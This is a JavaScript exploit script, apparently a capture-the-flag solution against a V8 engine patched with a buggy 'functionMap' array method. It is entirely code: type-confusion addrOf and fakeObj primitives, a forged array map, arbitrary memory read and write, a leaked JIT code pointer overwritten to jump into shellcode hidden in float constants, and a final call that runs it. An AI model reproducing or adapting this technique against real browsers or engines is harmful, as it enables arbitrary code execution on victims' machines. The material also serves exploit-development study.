2
var f64_buf = new Float64Array(buf);
3
var u64_buf = new BigUint64Array(buf);
4
var u32_buf = new Uint32Array(buf);
5

6
function f2i(val) {
7
    f64_buf[0] = val;
8
    return u64_buf[0];
9
}
10

11
function i2f(val) {
12
    u64_buf[0] = BigInt(val);
13
    return f64_buf[0];
14
}
15

16
function i2u_lo(i) {
17
    u64_buf[0] = BigInt(i);
18
    return u32_buf[0];
19
}
20

21
function i2u_hi(i) {
22
    u64_buf[0] = BigInt(i);
23
    return u32_buf[1];
24
}
25

26
function u2f(lo, hi) {
27
    u32_buf[0] = lo;
28
    u32_buf[1] = hi;
29
    return f64_buf[0];
30
}
31

32
function u2i(lo, hi) {
33
    u32_buf[0] = lo;
34
    u32_buf[1] = hi;
35
    return u64_buf[0];
36
}
37

38
const logInfo = (m) => console.log(`[*] ${m}`);
39
const logOK = (m) => console.log(`[+] ${m}`);
40
const logErr = (m) => console.log(`[-] ${m}`);
41

42
function toHex(x, w = 16) {
43
    x = BigInt.asUintN(64, x);
44
    return "0x" + x.toString(16);
45
}
46

47
function assert(c) {
48
    if (!c) {
49
        throw "Assertion Failed";
50
    }
51
}
52

53
function shellcode() {
54
    return [
55
        1.9995716422075807e-246,
56
        1.9710255944286777e-246,
57
        1.97118242283721e-246,
58
        1.971136949489835e-246,
59
        1.9711826272869888e-246,
60
        1.9711829003383248e-246,
61
        -9.254983612527998e+61
62
    ];
63
}
64

65
for (let i = 0; i < 10000; i++) shellcode();
66

67
function AddrOf(target) {
68
    let arr = [1.1, 1.1, 1.1];
69
    let addr = undefined;
70
    let idx = 0;
71

72
    arr.functionMap((value) => {
73
        switch (idx) {
74
            case 0:
75
                arr[2] = target;
76
                idx++;
77
                return value;
78
            case 1:
79
                addr = f2i(value);
80
                idx++;
81
                return value;
82
            default:
83
                idx++;
84
                return value;
85
        }
86
    });
87
    return addr;
88
}
89

90
function FakeObj(addr) {
91
    let arr = [1.1, 1.1, 1.1];
92
    let idx = 0;
93
    let obj = {};
94

95
    arr.functionMap((value) => {
96
        switch (idx) {
97
            case 0:
98
                arr[2] = obj;
99
                idx++;
100
                return i2f(addr);
101
            default:
102
                idx++;
103
                return value;
104
        }
105
    });
106
    return arr[0];
107
}
108

109
let fake_double_map = [i2f(0x31040404001c01b5n), i2f(0x0a8007ff11000844n)];
110
let fake_double_map_addr = AddrOf(fake_double_map) + 0x54n;
111
logInfo(`fake_double_map_addr: ${toHex(fake_double_map_addr)}`);
112

113
let shellcode_addr = AddrOf(shellcode);
114
logInfo("Shellcode addr: " + toHex(shellcode_addr));
115

116
let fake_array = [u2f(i2u_lo(fake_double_map_addr), 0), u2f(i2u_lo(shellcode_addr), 100)]
117
let fake_array_addr = AddrOf(fake_array);
118

119
let fake_obj = FakeObj(fake_array_addr + 0x54n);
120

121
function ArbRead(addr) {
122
    fake_array[1] = u2f(i2u_lo(addr - 0x8), 100);
123
    return f2i(fake_obj[0]);
124
}
125

126
function ArbWrite(addr, value) {
127
    fake_array[1] = u2f(i2u_lo(addr - 0x8), 100);
128
    fake_obj[0] = i2f(value);
129
}
130

131
let code_addr = ArbRead(i2u_lo(shellcode_addr) + 0xc);
132
logOK("Leaked code addr: " + toHex(code_addr));
133

134
let rwx_addr = ArbRead(i2u_lo(code_addr) + 0x14)
135
logOK("Leaked rwx addr: " + toHex(rwx_addr));
136

137
let shellcode_start = rwx_addr + 0x69n + 0x2n;
138
logInfo("Shellcode start at: " + toHex(shellcode_start));
139

140
// %DebugPrint(shellcode);
141
ArbWrite(i2u_lo(code_addr) + 0x14, shellcode_start);
142
assert(ArbRead(i2u_lo(code_addr) + 0x14) == shellcode_start);
143

144
// %SystemBreak();
145
shellcode();